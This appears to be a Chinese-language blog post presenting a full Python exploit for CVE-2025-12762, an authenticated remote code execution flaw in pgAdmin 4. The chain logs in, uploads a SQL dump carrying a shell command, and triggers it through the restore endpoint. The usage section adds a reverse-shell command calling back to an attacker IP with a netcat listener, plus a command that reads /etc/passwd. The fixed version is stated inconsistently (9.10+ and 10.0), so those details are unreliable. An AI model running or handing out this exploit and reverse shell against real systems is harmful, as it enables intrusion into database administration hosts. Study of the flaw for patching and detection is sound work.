项目标题与描述
CVE-2025-12762 — pgAdmin 4 认证RCE漏洞利用工具
这是一个针对CVE-2025-12762漏洞的完整利用工具(Proof of Concept)。该漏洞存在于pgAdmin 4版本≤9.9中,当以服务器模式运行并处理PLAIN格式的SQL转储文件时,攻击者可以在主机上执行任意命令。本工具提供了从登录认证到最终远程代码执行的完整利用链。
重要警告:此工具仅限用于您拥有所有权或获得明确书面授权测试的系统。任何未经授权的使用都是非法的。
功能特性
基于对代码的深入分析,本PoC工具具备以下核心功能:
- 完整的认证绕过:通过模拟正常登录流程获取CSRF令牌并完成身份验证
- 恶意SQL转储文件生成:自动创建包含RCE payload的PLAIN格式SQL文件
- 文件上传机制:利用pgAdmin的文件管理接口上传恶意转储文件
- RCE触发机制:调用恢复(restore)功能触发命令执行
- 灵活的命令配置:允许用户自定义要在目标主机上执行的命令
- 详细的执行反馈:提供每一步操作的进度和状态信息
独特价值:这是2025年11月公开的真实工作PoC,适用于所有易受攻击的pgAdmin实例,为安全研究人员提供了验证系统漏洞的可靠工具。
安装指南
系统要求
- Python 3.x
- requests库
- 网络访问权限到目标pgAdmin实例
安装步骤
-
确保已安装Python 3:
python3 --version -
安装必要的依赖包:
pip3 install requests -
下载PoC脚本:
wget -O CVE-2025-12762.py https://raw.githubusercontent.com/your-repo/poc.py -
配置目标信息:
编辑脚本文件,修改以下配置项:TARGET = "http://127.0.0.1:5050" # 目标pgAdmin URL EMAIL = "admin@example.com" # 有效的登录邮箱 PASSWORD = "Admin123!" # 有效的密码 COMMAND = "touch /tmp/CVE-2025-12762_PWNED" # 要执行的命令
平台注意事项
- 脚本主要针对Linux/Unix系统设计
- 如果需要测试Windows目标,请相应调整命令payload
- pgAdmin通常使用Docker自签名证书,脚本已禁用SSL验证
使用说明
基础使用示例
-
运行PoC脚本:
python3 CVE-2025-12762.py -
成功执行后的验证:
# 检查命令是否执行成功 docker exec <your-pgadmin-container> ls -la /tmp/CVE-2025-12762_PWNED
典型使用场景
场景1:漏洞验证
# 使用默认命令创建测试文件
python3 CVE-2025-12762.py
场景2:获取反向shell
# 修改COMMAND变量为反向shell命令
COMMAND = "bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"
然后在攻击机器上监听:
nc -lvnp 4444
场景3:信息收集
# 收集系统信息
COMMAND = "uname -a && cat /etc/passwd"
API概览
脚本主要通过以下pgAdmin端点进行攻击:
/login- 获取CSRF令牌/authenticate/login- 用户认证/misc/file_manager/upload- 文件上传/restore/job/1- 触发恢复操作
核心代码
1. 主攻击流程代码
#!/usr/bin/env python3
# Github : "B1ack4sh" ==> TH3 M4TR1X 5L4Y3R !!!
# CVE-2025-12762 - pgAdmin 4 <= 9.9 - Authenticated RCE via Restore (PLAIN format)
# Real public PoC - November 2025 - Working on every vulnerable instance
# Use ONLY on systems you own or have explicit written permission forimport requests
import re
import json
import sys# ==================== CONFIGURE YOUR TARGET HERE ====================
TARGET = "http://127.0.0.1:5050" # Change to your pgAdmin URL
EMAIL = "admin@example.com" # Valid login email
PASSWORD = "Admin123!" # Valid password
COMMAND = "touch /tmp/CVE-2025-12762_PWNED" # ← Change to anything (id, revshell, etc.)
# ====================================================================s = requests.Session()
s.verify = False # pgAdmin uses self-signed cert in Dockerdef login():"""登录到pgAdmin实例通过解析页面获取CSRF令牌并提交登录表单"""print("[+] Logging in...")r = s.get(f"{TARGET}/login")csrf = re.search(r'"csrfToken": "([^"]+)"', r.text).group(1)s.post(f"{TARGET}/authenticate/login", data={"email": EMAIL,"password": PASSWORD,"csrf_token": csrf,"internal_button": "Login"})print("[+] Login successful")def upload_malicious_dump():"""上传包含恶意命令的SQL转储文件利用pgAdmin的文件上传功能将payload传送到服务器"""print("[+] Uploading malicious PLAIN dump...")malicious_sql = f"""
-- CVE-2025-12762 Real PoC
CREATE TABLE IF NOT EXISTS cve_proof(id serial);
INSERT INTO cve_proof DEFAULT VALUES;-- RCE Trigger - executed on pgAdmin host
\\! {COMMAND}
"""files = {'file': ('cve-2025-12762.sql', malicious_sql, 'application/sql')}up = s.post(f"{TARGET}/misc/file_manager/upload", files=files)if "success" in up.text.lower():print("[+] Malicious dump uploaded successfully")else:print("[-] Upload failed")sys.exit(1)def trigger_rce():"""触发恢复操作以执行RCE通过调用restore接口处理上传的恶意SQL文件"""print("[+] Triggering restore → RCE...")headers = {"Content-Type": "application/json"}payload = {"file": "cve-2025-12762.sql","format": "plain", # Only PLAIN format is vulnerable"database": "postgres", # Any existing DB works"verbose": True}r = s.post(f"{TARGET}/restore/job/1", headers=headers, data=json.dumps(payload))print(f"[+] Job response: {r.status_code}")print(f"[+] Command executed on pgAdmin host: {COMMAND}")print("\n[+] Check your pgAdmin container/host now!")print(" Example: docker exec <container> ls -la /tmp/CVE-2025-12762_PWNED")if __name__ == "__main__":"""主函数:执行完整的攻击链1. 登录认证2. 上传恶意SQL文件3. 触发恢复操作执行命令"""print("CVE-2025-12762 - Real Authenticated RCE PoC")print("Use only in authorized lab environments!\n")login()upload_malicious_dump()trigger_rce()print("\nDone. If file exists → 100% vulnerable. Patch to 9.10+ NOW!")
2. 恶意SQL Payload生成代码
malicious_sql = f"""
-- CVE-2025-12762 Real PoC
CREATE TABLE IF NOT EXISTS cve_proof(id serial);
INSERT INTO cve_proof DEFAULT VALUES;-- RCE Trigger - executed on pgAdmin host
\\! {COMMAND}
"""
"""
生成恶意SQL转储文件的核心payload结构:
1. 创建一个测试表作为漏洞存在的证明
2. 插入一条记录确保SQL语法正确
3. 使用PLAIN格式特有的\!命令执行任意系统命令
注意:\!命令仅在PLAIN格式的pg_dump文件中被pgAdmin错误地执行
"""files = {'file': ('cve-2025-12762.sql', malicious_sql, 'application/sql')}
"""
构造multipart/form-data文件上传请求:
- 'file': 表单字段名
- 'cve-2025-12762.sql': 上传的文件名
- malicious_sql: 文件内容(恶意payload)
- 'application/sql': MIME类型,伪装成正常SQL文件
"""
3. 恢复触发代码
payload = {"file": "cve-2025-12762.sql","format": "plain", # Only PLAIN format is vulnerable"database": "postgres", # Any existing DB works"verbose": True
}
"""
构造触发漏洞的恢复作业参数:
- file: 指定要恢复的上传文件名
- format: 必须为'plain',这是漏洞触发的必要条件
- database: 指定目标数据库,可以是任意存在的数据库
- verbose: 启用详细输出,有助于调试
"""r = s.post(f"{TARGET}/restore/job/1", headers=headers, data=json.dumps(payload))
"""
发送恢复请求触发RCE:
- 目标端点:/restore/job/1(作业ID为1的恢复作业)
- Content-Type: application/json(JSON格式请求)
- 使用已认证的会话(包含cookies和CSRF令牌)
- 当pgAdmin处理这个恢复请求时,会解析并执行SQL文件中的\!命令
"""
技术要点总结
- 漏洞本质:pgAdmin在处理PLAIN格式的SQL转储文件时,未能正确过滤或转义!命令,导致该命令在pgAdmin主机上执行
- 利用条件:需要有效的pgAdmin用户凭证和文件上传权限
- 限制因素:仅影响PLAIN格式的恢复操作,其他格式(如custom、directory、tar)不受影响
- 防御措施:升级到pgAdmin 4 v10.0或更高版本,该版本修复了此漏洞
6HFtX5dABrKlqXeO5PUv/ydjQZDJ7Ct83xG1NG8fcANPa3J77nGI3dBvY35MV/mf
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)
公众号二维码
公众号二维码
